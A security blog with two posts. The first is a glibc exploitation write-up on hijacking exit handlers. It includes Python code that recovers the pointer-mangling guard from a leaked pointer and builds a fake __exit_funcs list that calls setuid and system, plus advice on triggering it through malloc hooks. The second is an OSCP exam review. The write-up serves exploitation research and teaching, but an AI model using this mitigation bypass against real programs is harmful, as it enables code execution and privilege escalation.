samedi 20 mai 2017

Notes on abusing exit handlers, bypassing pointer mangling and glibc ptmalloc hooks

Hi,

Today we'll talk about abusing exit handlers in order to hijack the control flow.

This research stemmed from Google Project Zero article about heap overflow
NULL byte poisoning where they described using __exit_funcs or tls_dtor_list
to achieve code execution.
The issue I had was to find a way to resolve reliably these
non-exported symbols and access them.

The exit handlers are quite interesting as it is an easy version to do ROP
as they all take one parameter.
Functions such as setuid(), system() or other functions needing 1 parameter
can thus be easily called.

Pointer mangling is a mitigation implemented in order to thwart
direct function pointer corruption.
I'll show in this post how it can be bypassed.

We'll first analyze the code leading to the execution of these exit handlers
and then show how to trigger them.
There will be a lot of pasted listing ahead, these will be explained as we go.

Where is the code leading to executing these exit handlers?

About exit ()

Whenever we call libc exit(), it calls all the handlers we registered
with atexit() and on_exit() before calling the _exit() syscall.

This is located in "glibc/stdlib/exit.c".

void
exit (int status)
{
  __run_exit_handlers (status, &__exit_funcs, true, true);
}

exit() is just a nicely named wrapper for "__run_exit_handlers()".

Let's look at __run_exit_handlers():

/* Call all functions registered with `atexit' and `on_exit',
   in the reverse of the order in which they were registered
   perform stdio cleanup, and terminate program execution with STATUS.  */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
       bool run_list_atexit, bool run_dtors)
{
  /* First, call the TLS destructors.  */
#ifndef SHARED
  if (&__call_tls_dtors != NULL)
#endif
    if (run_dtors)
      __call_tls_dtors ();

  /* We do it this way to handle recursive calls to exit () made by
     the functions registered with `atexit' and `on_exit'. We call
     everyone on the list and use the status value in the last
     exit (). */
  while (*listp != NULL)
    {
      struct exit_function_list *cur = *listp;

      while (cur->idx > 0)
 {
   const struct exit_function *const f =
     &cur->fns[--cur->idx];
   switch (f->flavor)
     {
       void (*atfct) (void);
       void (*onfct) (int status, void *arg);
       void (*cxafct) (void *arg, int status);

     case ef_free:
     case ef_us:
       break;
     case ef_on:
       onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
       PTR_DEMANGLE (onfct);
#endif
       onfct (status, f->func.on.arg);
       break;
     case ef_at:
       atfct = f->func.at;
#ifdef PTR_DEMANGLE
       PTR_DEMANGLE (atfct);
#endif
       atfct ();
       break;
     case ef_cxa:
       cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
       PTR_DEMANGLE (cxafct);
#endif
       cxafct (f->func.cxa.arg, status);
       break;
     }
 }

      *listp = cur->next;
      if (*listp != NULL)
 /* Don't free the last element in the chain, this is the statically
    allocate element.  */
 free (cur);
    }

  if (run_list_atexit)
    RUN_HOOK (__libc_atexit, ());

  _exit (status);
}

We can see that "__run_exit_handlers()" does use pointer demangling by using
PTR_DEMANGLE() before dereferencing the function pointers and calling
the pointed code.
We will thus need to analyze how the mangling and demangling is done in order
to bypass it.

We first see that it tries to call "__call_tls_dtors()", this is interesting
as this called function is used to call destructors in tls_dtor_list,
we'll come back to it.

Let's look what a 'struct exit_function_list' look like.

This is located in "glibc/stdlib/exit.h".

enum
{
  ef_free, /* `ef_free' MUST be zero!  */
  ef_us,
  ef_on,
  ef_at,
  ef_cxa
};

struct exit_function
  {
    /* `flavour' should be of type of the `enum' above but since we need
       this element in an atomic operation we have to use `long int'.  */
    long int flavor;
    union
      {
 void (*at) (void);
 struct
   {
     void (*fn) (int status, void *arg);
     void *arg;
   } on;
 struct
   {
     void (*fn) (void *arg, int status);
     void *arg;
     void *dso_handle;
   } cxa;
      } func;
  };
struct exit_function_list
  {
    struct exit_function_list *next;
    size_t idx;
    struct exit_function fns[32];
  };

Each handler can have 5 flavors : ef_free, ef_us, ef_on, ef_at and ef_cxa.
Depending on the flavor of the exit handler, we'll have a function pointer,
argument and/or dso handle.
The function list can store at most 32 handlers and a linked list is created
if more is needed.
idx is the total number of functions and is 1-based (not 0-based as usually).

And our PTR_MANGLE() and PTR_DEMANGLE() definitions in "sysdeps/unix/sysv/linux/x86_64/sysdep.h".

#  define PTR_MANGLE(var) asm ("xor %%fs:%c2, %0\n"        \
         "rol $2*" LP_SIZE "+1, %0"        \
         : "=r" (var)         \
         : "0" (var),         \
           "i" (offsetof (tcbhead_t,       \
            pointer_guard)))
#  define PTR_DEMANGLE(var) asm ("ror $2*" LP_SIZE "+1, %0\n"       \
         "xor %%fs:%c2, %0"         \
         : "=r" (var)         \
         : "0" (var),         \
           "i" (offsetof (tcbhead_t,       \
            pointer_guard)))

Here we can see that it uses the "pointer_guard" offset in
the structure "tcbhead_t" in order to access the pointer_guard in fs,
this will be fs:0x30 on 64-bits machines.

The assembly of "__run_exit_handlers()".

pwndbg> disassemble __run_exit_handlers
Dump of assembler code for function __run_exit_handlers:
   0x0000000000039f10 <+0>: push   r13
   0x0000000000039f12 <+2>: push   r12
   0x0000000000039f14 <+4>: mov    r12d,edx
   0x0000000000039f17 <+7>: push   rbp
   0x0000000000039f18 <+8>: push   rbx
   0x0000000000039f19 <+9>: mov    rbp,rsi
   0x0000000000039f1c <+12>: mov    ebx,edi
   0x0000000000039f1e <+14>: sub    rsp,0x8
   0x0000000000039f22 <+18>: call   0x3a5c0 <__gi___call_tls_dtors>
   0x0000000000039f27 <+23>: mov    r13,QWORD PTR [rbp+0x0]
   0x0000000000039f2b <+27>: test   r13,r13
   0x0000000000039f2e <+30>: je     0x39f80 <__run_exit_handlers>
   0x0000000000039f30 <+32>: mov    rax,QWORD PTR [r13+0x8]
   0x0000000000039f34 <+36>: mov    rdx,rax
   0x0000000000039f37 <+39>: shl    rdx,0x5
   0x0000000000039f3b <+43>: test   rax,rax
   0x0000000000039f3e <+46>: lea    rcx,[r13+rdx*1-0x10]
   0x0000000000039f43 <+51>: je     0x39f6f <__run_exit_handlers>
   0x0000000000039f45 <+53>: sub    rax,0x1
   0x0000000000039f49 <+57>: mov    QWORD PTR [r13+0x8],rax
   0x0000000000039f4d <+61>: mov    rdx,QWORD PTR [rcx]
   0x0000000000039f50 <+64>: cmp    rdx,0x3
   0x0000000000039f54 <+68>: je     0x3a000 <__run_exit_handlers>
 ; ef_cxa
   0x0000000000039f5a <+74>: cmp    rdx,0x4
   0x0000000000039f5e <+78>: je     0x39fd8 <__run_exit_handlers>

   0x0000000000039f60 <+80>: cmp    rdx,0x2
   0x0000000000039f64 <+84>: je     0x39fb0 <__run_exit_handlers>
   0x0000000000039f66 <+86>: sub    rcx,0x20
   0x0000000000039f6a <+90>: test   rax,rax
   0x0000000000039f6d <+93>: jne    0x39f45 <__run_exit_handlers>
   0x0000000000039f6f <+95>: mov    rax,QWORD PTR [r13+0x0]
   0x0000000000039f73 <+99>: test   rax,rax
   0x0000000000039f76 <+102>: mov    QWORD PTR [rbp+0x0],rax
   0x0000000000039f7a <+106>: jne    0x3a01d <__run_exit_handlers>
   0x0000000000039f80 <+112>: test   r12b,r12b
   0x0000000000039f83 <+115>: je     0x39fa4 <__run_exit_handlers>
   0x0000000000039f85 <+117>: lea    rbp,[rip+0x38594c]        # 0x3bf8d8 <__elf_set___libc_atexit_element__io_cleanup__>
   0x0000000000039f8c <+124>: lea    r12,[rip+0x38594d]        # 0x3bf8e0 <__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__>
   0x0000000000039f93 <+131>: cmp    rbp,r12
   0x0000000000039f96 <+134>: jae    0x39fa4 <__run_exit_handlers>
   0x0000000000039f98 <+136>: call   QWORD PTR [rbp+0x0]
   0x0000000000039f9b <+139>: add    rbp,0x8
   0x0000000000039f9f <+143>: cmp    rbp,r12
   0x0000000000039fa2 <+146>: jb     0x39f98 <__run_exit_handlers>
   0x0000000000039fa4 <+148>: mov    edi,ebx
   0x0000000000039fa6 <+150>: call   0xcbb60 <__gi__exit>
   0x0000000000039fab <+155>: nop    DWORD PTR [rax+rax*1+0x0]
   0x0000000000039fb0 <+160>: shl    rax,0x5
   0x0000000000039fb4 <+164>: mov    edi,ebx
   0x0000000000039fb6 <+166>: add    rax,r13
   0x0000000000039fb9 <+169>: mov    rdx,QWORD PTR [rax+0x18]
   0x0000000000039fbd <+173>: mov    rsi,QWORD PTR [rax+0x20]
   0x0000000000039fc1 <+177>: ror    rdx,0x11
   0x0000000000039fc5 <+181>: xor    rdx,QWORD PTR fs:0x30
   0x0000000000039fce <+190>: call   rdx
   0x0000000000039fd0 <+192>: jmp    0x39f30 <__run_exit_handlers>
   0x0000000000039fd5 <+197>: nop    DWORD PTR [rax]

 ; ef_cxa
   0x0000000000039fd8 <+200>: shl    rax,0x5
   0x0000000000039fdc <+204>: mov    esi,ebx
   0x0000000000039fde <+206>: add    rax,r13
   0x0000000000039fe1 <+209>: mov    rdx,QWORD PTR [rax+0x18]
   0x0000000000039fe5 <+213>: mov    rdi,QWORD PTR [rax+0x20]
   0x0000000000039fe9 <+217>: ror    rdx,0x11
   0x0000000000039fed <+221>: xor    rdx,QWORD PTR fs:0x30
   0x0000000000039ff6 <+230>: call   rdx
   0x0000000000039ff8 <+232>: jmp    0x39f30 <__run_exit_handlers>
   0x0000000000039ffd <+237>: nop    DWORD PTR [rax]
   0x000000000003a000 <+240>: shl    rax,0x5
   0x000000000003a004 <+244>: mov    rax,QWORD PTR [r13+rax*1+0x18]
   0x000000000003a009 <+249>: ror    rax,0x11
   0x000000000003a00d <+253>: xor    rax,QWORD PTR fs:0x30
   0x000000000003a016 <+262>: call   rax
   0x000000000003a018 <+264>: jmp    0x39f30 <__run_exit_handlers>
   0x000000000003a01d <+269>: mov    rdi,r13
   0x000000000003a020 <+272>: call   0x1f8a8
   0x000000000003a025 <+277>: jmp    0x39f27 <__run_exit_handlers>
End of assembler dump.

In case you missed it, the code that really interest us is this:

   0x0000000000039fe9 <+217>: ror    rdx,0x11
   0x0000000000039fed <+221>: xor    rdx,QWORD PTR fs:0x30
   0x0000000000039ff6 <+230>: call   rdx


So what's stored at fs:0x30?
Let's look at Thread Control Block.

About Thread Control Block

Like we saw in PTR_MANGLE() and PTR_DEMANGLE(), it all has to do with
the structure "tcbhead_t".
This structure is what's stored at FS, which correspond to the per thread data
(TCB probably for Thread Control Block).

So at fs:0x30 we get the pointer_guard.

It's the pointer guard as defined in "sysdeps/x86_64/nptl/tls.h" in the
structure "tcbhead_t".

typedef struct
{
  void *tcb;  /* Pointer to the TCB.  Not necessarily the
      thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;  /* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;
  unsigned long int vgetcpu_cache[2];
# ifndef __ASSUME_PRIVATE_FUTEX
  int private_futex;
# else
  int __glibc_reserved1;
# endif
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  long int __glibc_reserved2;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));

  void *__padding[8];
} tcbhead_t;


Where is that pointer_guard setted up?


It's setted up in "csu/libc-start.c".

  /* Set up the pointer guard value.  */
  uintptr_t pointer_chk_guard = _dl_setup_pointer_guard (_dl_random,
        stack_chk_guard);
# ifdef THREAD_SET_POINTER_GUARD
  THREAD_SET_POINTER_GUARD (pointer_chk_guard);
# else
  __pointer_chk_guard_local = pointer_chk_guard;
# endif

We could go look the code at "_dl_setup_pointer_guard()" but research was not
done there.

We still need to determine where we can hit and overwrite these handlers.
Let's start with __exit_funcs.

About atexit() and finding __exit_funcs


The "atexit()" code is located in "cxa_atexit.c"

/* Register a function to be called by exit or when a shared library
   is unloaded.  This function is only called from code generated by
   the C++ compiler.  */
int
__cxa_atexit (void (*func) (void *), void *arg, void *d)
{
  return __internal_atexit (func, arg, d, &__exit_funcs);
}
libc_hidden_def (__cxa_atexit)

And the corresponding assembly.

pwndbg> disassemble __cxa_atexit 
Dump of assembler code for function __GI___cxa_atexit:
   0x000000000003a280 <+0>: push   r12
   0x000000000003a282 <+2>: push   rbp
   0x000000000003a283 <+3>: mov    r12,rsi
   0x000000000003a286 <+6>: push   rbx
   0x000000000003a287 <+7>: mov    rbx,rdi
   0x000000000003a28a <+10>: lea    rdi,[rip+0x389367]        # 0x3c35f8 <__exit_funcs>
   0x000000000003a291 <+17>: mov    rbp,rdx
   0x000000000003a294 <+20>: call   0x3a0a0 <__new_exitfn>
   0x000000000003a299 <+25>: test   rax,rax
   0x000000000003a29c <+28>: je     0x3a2c8 <__gi___cxa_atexit>
   0x000000000003a29e <+30>: mov    rdi,rbx
   0x000000000003a2a1 <+33>: mov    QWORD PTR [rax+0x10],r12
   0x000000000003a2a5 <+37>: mov    QWORD PTR [rax+0x18],rbp
   0x000000000003a2a9 <+41>: xor    rdi,QWORD PTR fs:0x30
   0x000000000003a2b2 <+50>: rol    rdi,0x11
   0x000000000003a2b6 <+54>: mov    QWORD PTR [rax+0x8],rdi
   0x000000000003a2ba <+58>: mov    QWORD PTR [rax],0x4
   0x000000000003a2c1 <+65>: xor    eax,eax
   0x000000000003a2c3 <+67>: pop    rbx
   0x000000000003a2c4 <+68>: pop    rbp
   0x000000000003a2c5 <+69>: pop    r12
   0x000000000003a2c7 <+71>: ret    
   0x000000000003a2c8 <+72>: mov    eax,0xffffffff
   0x000000000003a2cd <+77>: jmp    0x3a2c3 <__gi___cxa_atexit>
End of assembler dump.

What's interesting is "__exit_funcs" being used.
"__exit_funcs" is an un-exported function but we can resolve it by disassembling
that piece of assembly with capstone and retrieving the needed VA.
"__cxa_atexit()" is an exported symbol so we can retrieve the VA easily using
pwntools.elf.ELF.
You can see at VA 0x3a28a that it calculates the address of "__exit_funcs".

Here is the code I wrote to do just that:

# get __exit_funcs addr
def get_exit_funcs (code, off = 0):
    md = Cs (CS_ARCH_X86, CS_MODE_64)
    md.detail = True

    # look for ptr offset
    ptr_exit_funcs = None
    for inst in md.disasm (code[off:], off):
        if inst.mnemonic != 'lea':
            continue
        for operand in inst.operands:

            if operand.type == x86.X86_OP_MEM:
                if inst.reg_name (operand.value.mem.base) != 'rip':
                    continue
                ptr_exit_funcs = inst.address + inst.size + operand.value.mem.disp
                break
        if ptr_exit_funcs:
            break

    if ptr_exit_funcs is None:
        return None
    return ptr_exit_funcs

I'll show at the end of the article how to use it to bypass pointer mangling.
Let's first have a look at tls_dtor_list.

About __call_tls_dtors() and finding tls_dtor_list


I was talking about "__call_tls_dtors()" being an interesting piece of code
to look at.

/* Call the destructors.  This is called either when a thread returns from the
   initial function or when the process exits via the exit function.  */
void
__call_tls_dtors (void)
{
  while (tls_dtor_list)
    {
      struct dtor_list *cur = tls_dtor_list;
      dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
      PTR_DEMANGLE (func);
#endif

      tls_dtor_list = tls_dtor_list->next;
      func (cur->obj);

      /* Ensure that the MAP dereference happens before
  l_tls_dtor_count decrement.  That way, we protect this access from a
  potential DSO unload in _dl_close_worker, which happens when
  l_tls_dtor_count is 0.  See CONCURRENCY NOTES for more detail.  */
      atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
      free (cur);
    }
}

The part that really interest us is about tls_dtor_list being used.

The corresponding assembly.
pwndbg> disassemble __GI___call_tls_dtors
Dump of assembler code for function __GI___call_tls_dtors:
   0x000000000003a5c0 <+0>: push   rbp
   0x000000000003a5c1 <+1>: push   rbx
   0x000000000003a5c2 <+2>: sub    rsp,0x8
   0x000000000003a5c6 <+6>: mov    rbp,QWORD PTR [rip+0x3887b3]        # 0x3c2d80
   0x000000000003a5cd <+13>: mov    rbx,QWORD PTR fs:[rbp+0x0]
   0x000000000003a5d2 <+18>: test   rbx,rbx
   0x000000000003a5d5 <+21>: je     0x3a61e <__gi___call_tls_dtors>
   0x000000000003a5d7 <+23>: nop    WORD PTR [rax+rax*1+0x0]
   0x000000000003a5e0 <+32>: mov    rdx,QWORD PTR [rbx+0x18]
   0x000000000003a5e4 <+36>: mov    rax,QWORD PTR [rbx]
   0x000000000003a5e7 <+39>: mov    rdi,QWORD PTR [rbx+0x8]
   0x000000000003a5eb <+43>: ror    rax,0x11
   0x000000000003a5ef <+47>: xor    rax,QWORD PTR fs:0x30
   0x000000000003a5f8 <+56>: mov    QWORD PTR fs:[rbp+0x0],rdx
   0x000000000003a5fd <+61>: call   rax
   0x000000000003a5ff <+63>: mov    rax,QWORD PTR [rbx+0x10]
   0x000000000003a603 <+67>: lock sub QWORD PTR [rax+0x450],0x1
   0x000000000003a60c <+76>: mov    rdi,rbx
   0x000000000003a60f <+79>: call   0x1f8a8
   0x000000000003a614 <+84>: mov    rbx,QWORD PTR fs:[rbp+0x0]
   0x000000000003a619 <+89>: test   rbx,rbx
   0x000000000003a61c <+92>: jne    0x3a5e0 <__gi___call_tls_dtors>
   0x000000000003a61e <+94>: add    rsp,0x8
   0x000000000003a622 <+98>: pop    rbx
   0x000000000003a623 <+99>: pop    rbp
   0x000000000003a624 <+100>: ret    
End of assembler dump.

You can see at VA 0x3a5c6 that it dereferences the pointer to tls_dtor_list.
So we can disassemble that function and find that offset using capstone.
"__call_tls_dtors" is exported so the address can be easily parsed out
using pwntools.elf.ELF.

I didn't write code for it but the idea is the same as for __exit_funcs,
this is left as an exercise to the reader.

Bypassing pointer mangling


While playing with a binary challenge, I happened to see that _dl_fini()
is often registered in the __exit_funcs array, so we can recalculate
the pointer_guard value and thus bypass pointer mangling.

The issue with "_dl_fini()" is that it seems to be an un-exported symbol.
I've found the address while digging in gdb.
An elf parser probably has to be written to find "_dl_fini()" address.

A vulnerability that allows you to leak an encoded pointer in __exit_funcs
is also necessary.
Here we use _dl_fini encoded pointer.

The formula to compute the pointer_guard using the assumpting that "_dl_fini()"
is used is as follow:

ptr_guard = ror (ptr_encoded, 0x11, 64) ^ _dl_fini

Here the code you've been waiting for. We re-use "get_exit_funcs()" that
was showed earlier.

# Rotate left: 0b1001 --> 0b0011
rol = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
 
# Rotate right: 0b1001 --> 0b1100
ror = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))

elf = ELF (libc_filename)

# get libc data
content = ''
with open (libc_filename) as fp:
    content = fp.read ()

# get our exit_funcs address
off_cxa_atexit = elf.symbols['__cxa_atexit']
ptr_exit_funcs = libc_base + get_exit_funcs (content, off_cxa_atexit)
off_exit_funcs = ptr_exit_funcs - start_data
__exit_funcs = struct.unpack ('<Q', libc_data[off_exit_funcs:off_exit_funcs + 8])[0]
# our encoded pointer location
off_ptr_encoded = (__exit_funcs - start_data) + 24
ptr_encoded = struct.unpack ('<Q', libc_data[off_ptr_encoded:off_ptr_encoded + 8])[0]
# this is used to encode pointers
ptr_guard = ror (ptr_encoded, 0x11, 64) ^ _dl_fini

print '\n[+] Leak __exit_funcs'
print 'start_data               : 0x%016x' % start_data
print 'ptr_exit_funcs           : 0x%016x' % ptr_exit_funcs
print 'exit_funcs               : 0x%016x' % __exit_funcs
print 'off_ptr_encoded          : 0x%016x' % off_ptr_encoded
print 'ptr_encoded              : 0x%016x' % ptr_encoded
print 'ptr_guard                : 0x%016x' % ptr_guard

Now that we got the pointer_guard, what do we do?

We craft a fake __exit_funcs and corrupt the original __exit_funcs.

class CxaFunc (object):
    def __init__ (self, func, arg, ptr_guard):
        self.func = func
        self.arg = arg
        self.ptr_guard = ptr_guard

    def __str__ (self):
        # flavor = 4 (ef_cxa) + func + arg + NULL (dso handle)
        if self.ptr_guard:
            encoded = rol (self.func ^ self.ptr_guard, 0x11, 64)
        else:
            encoded = self.func
        print 'func : 0x%016x | encoded : 0x%016x | arg : 0x%016x' % (self.func, encoded, self.arg)
  # ef_cxa == 4 | encoded function pointer | argument | dso handle set to NULL
        data = struct.pack ('<Q', 4) + struct.pack ('<Q', encoded) + struct.pack ('<Q', self.arg) + struct.pack ('<Q', 0)
        return data

class ExitHandlers (object):
    def __init__ (self, ptr_guard):
        self.handlers = list ()
        self.ptr_guard = ptr_guard

    def append (self, func, arg):
        cxafunc = CxaFunc (func, arg, self.ptr_guard)
        self.handlers.append (cxafunc)

    def __str__ (self):
        fake_exit_funcs = ''
        # next = NULL
        fake_exit_funcs += struct.pack ('<Q', 0)
        # idx = number of handlers
        print 'Packing %d handlers' % len (self.handlers)
        fake_exit_funcs += struct.pack ('<Q', len (self.handlers))
        for cxafunc in self.handlers:
            fake_exit_funcs += str (cxafunc)

        return fake_exit_funcs

# build our exit_funcs functions list
fake_exit_funcs = ExitHandlers (ptr_guard)
# setuid
fake_exit_funcs.append (func_setuid, 0)
# system and get cmd
for heap_addr in heap_addrs:
    fake_exit_funcs.append (func_system, heap_addr)
fake_exit_funcs = str (fake_exit_funcs)

Given you've recalculated the proper pointer_guard ... pointer mangling is
bypassed.

Other (untested) ideas to get the pointer_guard?


There probably is another way to get that pointer_guard given you've got
an arbitrary infoleak. This may be possible through a pointer corruption
or a UAF or Type Confusion or something else.
If the attacker somehow manage to find where 'struct tcbhead' is located
in memory, he may be able to just read the value out of it.

Last idea is probably far fetched but let's look at it.
Let's say you got an oracle : crash or not crash and that your process
is respawned through a fork().
You could probably use techniques similar as those used for blind rop
to guess the pointer guard.
More research can be done there but we don't need it for now.

About glibc ptmalloc hooks


It may come a time where you somehow can't manage to exit a program running
as it may run in a infinite loop for example.

In order to use our previous technique, the process has to call
the libc exit() function.
This happens when the process prepare to exit.

We may be able to trigger that function before reaching the end of the program
by using glibc ptmalloc hooks.
In each glibc ptmalloc functions, there is a function pointer that is called
given it's not NULL.
By over-writing one of these hooks with glibc exit() function
and triggering the corresponding malloc(), free() or realloc() call,
we'll trigger the execution of our payload written in __exit_funcs.

These functions hook are all exported symbols that you can easily get with
pwntools.elf.ELF : __free_hook, __malloc_hook, __realloc_hook and __memalign_hook.

Conclusion


Full mitigations bypass is still possible nowadays on the latest
Linux distribution given the proper vulnerabilities and binary. Every technique
is applicable on a case-by-case basis.
Pointer mangling was implemented in order to make destructors corruption
exploitation harder, but as can be seen it's not impossible.

This technique is particularly useful when you don't know where the stack is
and you have full RELRO activated.
It allows you to do an easy version of ROP.

Cheers,

m_101

References


- The poisoned NULL byte, 2014 edition : https://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
- Pointer Encryption : https://sourceware.org/glibc/wiki/PointerEncryption


vendredi 31 mars 2017

Yet Another OSCP Review

I just took the OSCP Course and successfully passed the exam.
There are many other great reviews of the course out there, just thought I'd add my grain of salt.

I decided to take that course as I wanted to see where I was at in terms of hacking and penetration testing skills. As some of  you know, I've been more or less playing with code, hacks and exploits there and there for some time now.
So yeah, it was time for something a little bit more formal and still hand-on.

About the PWK - OSCP lab

This training is an introductory course to penetration testing.
It is not an easy certification mainly due to the time that needs to be dedicated.

The lab is composed of a simulated company network, it is well thought out.
There are multiple sub-networks and dependencies between machines.


The goal is to hack and obtain administrator, SYSTEM or root privileges on as many machines as you can. You have no obligation to hack all the machines, but there are quite a lot of them which are interesting.

Machines run Linux, Windows or FreeBSD.
Vulnerabilities goes from 2000 to end of 2016.
You thus see a wide array of technologies, vulnerabilities and ways to hack into computers.

The course material consist of a PDF eBook and a couple of videos.
Apart from that, it's self-learning and sharing information on #offsec IRC or the forums. No information sharing about machines is tolerated though.

The staff is pretty helpful to confirm the track you're on without giving you anything that spoil the challenges.
They will help you and motivate you as long as you've shown that you worked hard and did the proper research.

Pre-Requisite


Many skills are recommended to have before-hand unless you want to really suffer:
- Linux and Windows command-line skills
- some basic scripting skills : some exploits modification are required in the lab
- training on vulnhub VMs will make your experience smoother and better
- IT experience : networking, development or security
You could start from 0, but as some people say : they've suffered even though they liked the course.
It is a HARD course for anyone starting in the field.
But it is necessary. No way around learning the hard way and suffering a little bit.

This is NOT an exploit development course, so you don't need to understand everything about assembly or buffer overflow or other exploitation techniques.
There are buffer overflows to exploit in the course, but these are explained sufficiently in details step by step in order for anyone taking the course to understand it.

My lab run

Pwning the lab

There are 30, 60 or 90 days packages, each including an exam attempt.

I took the 30 days package as I figured I'd extend by 30 days if necessary.
I ended up doing the whole lab in around 3 weeks and the remaining time for the lab report (150-300 pages depending on people).
Plan time for the lab report as access to the lab is necessary for some exercises.

I started my lab around the start of February and worked on it until start of March.

I was clocking in around 10-15h/day, yeah I had the opportunity to do the OSCP lab and exam full time so I did it.
In retrospect, it would have been better to take the 60 days package. It would have been a better balance.

The thing that took most of my time was recon, enumeration and post-exploitation.
Some machines can't be exploited frontally, there are dependencies between machines. Dependencies students have to find by themselves.

Taking notes while rooting boxes saved me a ton of time.
I was having around 2-5 boxes a day.
Fastest was 10 minutes, slowest was 5-6h.
While pwning boxes, I had enumeration tools running (dirbuster, etc).

How to do it in such a limited time frame?

- have time to dedicate to the course
- be organized : exploits, notes, TTP (Tactics Techniques Procedures), etc
- run multiple scans in parallel in a staged fashion (nmap top 1000 ports then full ports while you're analyzing the first scan, multiple dirbusters running targeting multiple machines, etc)
- statically compiled tools (if you've played with pivots, you probably know why ;))
- go after low hanging fruits first
- keep proper notes about every important steps you take
- do proper post-exploitation
- already have some experience
- Ask yourself the right questions. Don't blindly follow "exploitation guides", "penetration guides" or "privilege escalation guides". Ask yourselves what are the objectives and goal of each steps described?

How much time should I take?

This is really subjective.
I'll based those approximations from people I spoke to on IRC.
For someone with pentesting experience, been pwning quite some boxes, got time after work, I'd say 30-60 days.
For someone with a good development background, got some time after work, 3-6 months.
For someone with no IT skills, 1-3 years.

The most important thing being motivation and the time you can dedicate everyday to the course.
This is why this certification is hard : it will take your time, you need caring people and external distractions from time to time.

Use automated scripts or not?

I typed every single commands by hand, there are multiple reasons for that:
- faster : automated scripts are great but they run scans that can be useless in the end. For instance, if you managed to find a flaw resulting in Remote Code Execution in the found web app ... What use is there for running dirb, nikto, snmpwalk or SMB NULL enumeration?
Once access is gained, 'netstat' and file enumeration are faster and better "port scanners" and "version probers".
- automated scripts are not for speed, it is for consistency. Attack consistency can probably be fingerprinted and attack patterns be extracted.
- automated scripts are super noisy, rarely can fine tune the details
- better memorization
- better tool understanding (and thus better adaptation, not depending on a single tool)
- I can't allow a tool to interpret data for me without me being able to check that raw data. Having interpreted data AND raw data is really important, vulnerabilities can be in the details.

Other tips?

Getting good at hacking or pentesting is not all about the technical part.
Get breaks, go run, see friends, have beers, have a balanced life while doing the certification.
This certification sure is addictive, so be careful.

About the OSCP exam

The exam is hard, not for technical reasons but for the duration reason in my opinion. I'll come back to that later.
If you try the exam, it means you're kind of ready to validate your technical skills and knowledge.

The exam include 5 machines to hack.
Each machines are graded from 10 to 25 points.
10 points being the easiest and 25 points the hardest.
You need 70 points to pass the certification.

It is subjective, depending on your skillset, the 25 points machines may be easy for you.

The duration reason : you got 23h45 minutes to validate the exam.
It looks like a long time, but hours do burn fast.

My exam run

A 0.5 box is an access obtained with low privileges.
A 1 box is an access obtained with full privileges.

The duration reason is the real hard part.
After some time, you also get tunnel vision and you get pretty tired. So take breaks.

Before the exam:
- a step back from hacking
- beers with friends
- going out a little bit
- some rest
It helps to disconnect from the subject to avoid tunnel vision.

So what I prepared:
- a super clean and tidy room and environment
- lots of food and drinks
- breaks and naps
- No coffee, red bull or whatever substances that people use in order to stay awake. It's a trap as you won't be able to have efficient naps. Naps were ultra super helpful.

Attacking machine:
- a clean and fully updated and configured Kali VM
- CherryTree for note taking
- crackmapexec for popping shells (can't use exploit/* but the multi/handler in the exam)
- metasploit multi/handler
- SecLists
- GIMP for cropping screenshots
- remmina for RDP
- bunch of other stuffs

I had 2 attempts.
In both attempts, I did not use any metasploit exploits, auxiliary or post module.

1st attempt

In retrospect I could have passed with the 1st try and here are my main mistakes:
- not following my intuition : "this smells vulnerable", almost at the end of the exam I ended up with a low privilege shell quickly on one of the box I was stucked on
- not rested enough before the exam
- too many tabs open in my browser : close them regularly

I failed for non technical reasons.
Don't take a fail as a failure but as a learning experience to further improve yourself for next time.

2nd attempt

Unfortunately, I got sick during the 48h preceding my scheduled exam time.
According to Offensive Security rules, no cancelation or re-scheduling is possible during that time. So I just went on with it.
I can say that it was really painful, between being tired, sick, coughing and the exam but I managed to get it.

After 4-5h + 1h (lunch) + 4-5h I had 1.5 boxes and was still poking around for recon and enumeration. I thought I was doomed.
I went to sleep for 4h, waked up, got some dinner and got 2.5 boxes in 5h. I had 4 boxes, enough to pass the exam.

Stucked on the 5th box, I tried to sleep for 2-3h, but ended up reading, playing games, googling, watching "The Flash" last episode, making sure my notes and screenshots were neat, small power nap.

Went back to the 5th box, couldn't gain access.
In the end, exhausted, I stopped around 3h before the end of the exam and went to sleep.

So during those 23h45, I got around 7h of sleep splitted in 2, 15h of challenge time and 2h for entertainment and food. Refreshments during the whole exam. Those are approximates.

The next day I wrote my report and got an hypothesis as how to root the last box. This hypothesis stemed from the feeling "IT IS vuln there" I had while attempting to root the 5th box.

The next day (today), got the email with the "pass" result, it was such a relief that I could go back to a normal life again.
I'll wait some time before passing OSCE, hopefully before the end of the year.

Conclusion

Everyone would say "try harder" but not everyone knows what it means.

Try harder is the embodiment of the following:
- keep at it
- be persistent
- recon, enumerate as much as you can
- research and research more
- ask yourself the proper questions and don't run tools blindly
- have a deep understanding of what's happening under the hood
"Try harder AND smarter."

I mostly learned:
- be better organized for note taking, screenshots, etc
- better pivoting and file transfer tricks
- improved methodologies and intuition

It was a nerve-wrecking certification.
The most nerve-wrecking part was probably before submitting the final exam report. Spent a LOT of time checking and rechecking that nothing was missed.

Anyone can do it.
It is not as hard as everyone says it to be (impossible, etc).
It is not an easy certification though.
If you work hard, you are persistent and really keep at it, you'll end up getting it.
